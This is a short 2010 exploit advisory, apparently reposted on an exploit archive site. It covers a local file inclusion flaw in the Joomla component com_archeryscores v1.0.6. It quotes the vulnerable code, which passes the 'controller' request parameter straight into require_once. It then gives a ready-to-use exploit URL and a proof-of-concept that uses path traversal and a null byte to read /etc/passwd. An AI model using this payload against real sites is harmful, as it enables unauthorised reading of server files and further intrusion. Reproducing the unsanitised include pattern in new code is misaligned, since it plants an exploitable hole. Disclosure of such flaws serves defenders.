Home / os / win7

Joomla Component com_archeryscores v1.0.6 LFI Vulnerability

Posted on 18 April 2010

===========================================================
Joomla Component com_archeryscores v1.0.6 LFI Vulnerability
===========================================================

================================================================================================
 
 Title    : Joomla Component Archery Scores (com_archeryscores) v1.0.6 LFI Vulnerability
 Vendor   : http://lispeltuut.org/
 Download : http://lispeltuut.org/archery-scores/download
 
 Date     : Sunday, 18 April 2010 - GMT +07:00 Jakarta, Indonesia
 Author   : wishnusakti + inc0mp13te (HH)
 Contact  : evileyes60117[at]yahoo.com
 
 ================================================================================================
 
 [+] Vulnerable
 
     ./components/com_archeryscores/archeryscores.php
 
     Line 22: if($controller = JRequest::getVar('controller')) {
     Line 23:   require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');
     Line 24: }
 
 [+] Exploit
 
     http://[site]/[path]/index.php?option=com_archeryscores&controller=[LFI]
 
 [+] PoC
 
     http://localhost/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00
 
 ================================================================================================


# Inj3ct0r.com [2010-04-18]

 

TOP

Malware :

Exploits :